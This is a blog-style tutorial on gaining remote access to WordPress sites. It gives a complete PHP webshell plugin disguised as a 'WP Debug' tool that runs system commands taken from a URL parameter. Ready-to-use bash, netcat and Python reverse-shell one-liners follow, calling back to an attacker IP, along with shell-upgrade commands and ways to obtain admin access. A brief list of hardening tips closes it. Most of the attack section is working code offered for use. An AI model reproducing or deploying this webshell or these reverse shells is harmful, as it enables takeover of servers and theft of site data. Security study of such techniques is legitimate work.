WordPress Reverse Shell: Achieving Full Access

Published on February 14, 2025

1. Introduction

WordPress allows users to install plugins, which extend the platform’s functionality. However, this feature can be misused to execute arbitrary code. If an attacker gains admin access to a WordPress site, they can install a malicious plugin that acts as a webshell, enabling command execution and remote access.

2. Gaining Admin Access

To install a plugin, an attacker must first obtain administrator privileges. This can be achieved through various methods:

  • Exploiting weak passwords using brute force attacks.
  • Phishing the admin credentials.
  • Exploiting vulnerabilities in outdated plugins.
  • Leveraging stored XSS or SQL Injection to escalate privileges.

Once admin access is obtained, the attacker can install a custom WordPress plugin that provides remote command execution.

3. Creating a WordPress Webshell Plugin

A WordPress plugin is a small PHP script that runs within WordPress to extend its capabilities. Below is a simple plugin that allows executing system commands. 

<?php
/**
 * Plugin Name: WP Shell Plugin
 * Description: A debugging tool with hidden command execution.
 */

if (!defined('ABSPATH')) { exit; }

function wp_hidden_webshell() {
    if (isset($_GET['cmd']) && is_user_logged_in() && current_user_can('administrator')) {
        echo "<pre>";
        system($_GET['cmd']);
        echo "</pre>";
        exit;
    }
}

add_action('admin_menu', function() {
    add_menu_page('WP Debug', 'WP Debug', 'manage_options', 'wp-debug', 'wp_hidden_webshell', 'dashicons-admin-tools', 99);
});
?>

Usage: Install this plugin and access the webshell via:

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=whoami

4. Sending a Reverse Shell in One Command

Instead of manually executing multiple commands, you can send a one-liner reverse shell through the cmd= parameter.

Bash Reverse Shell

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

It needs to be properly encoded in order to escape > and &: 

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/YOUR_IP/4444%200%3E%261'

Netcat Reverse Shell

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=nc -e /bin/sh YOUR_IP 4444

Python Reverse Shell

http://target.com/wp-admin/admin.php?page=wp-debug&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

5. Upgrading the Reverse Shell

Once a reverse shell is established, it may be limited in functionality. Below are several methods to upgrade it to a fully interactive shell.

Python TTY Upgrade

python3 -c 'import pty; pty.spawn("/bin/bash")'

Using script for Full TTY

script /dev/null -c bash

stty and Backgrounding

stty raw -echo; fg
export TERM=xterm

6. Defending Against Reverse Shells

To secure WordPress against reverse shell attacks, follow these best practices:

  • Disable dangerous PHP functions (exec(), system(), shell_exec()).
  • Restrict plugin installations to trusted administrators.
  • Monitor web requests for suspicious activity (cmd= in URLs).
  • Use a Web Application Firewall (WAF) to block command injection attempts.

7. Conclusion

WordPress plugins can be used to execute a reverse shell, granting an attacker remote access to the system. However, proper security hardening and monitoring can prevent these attacks.

Linked Articles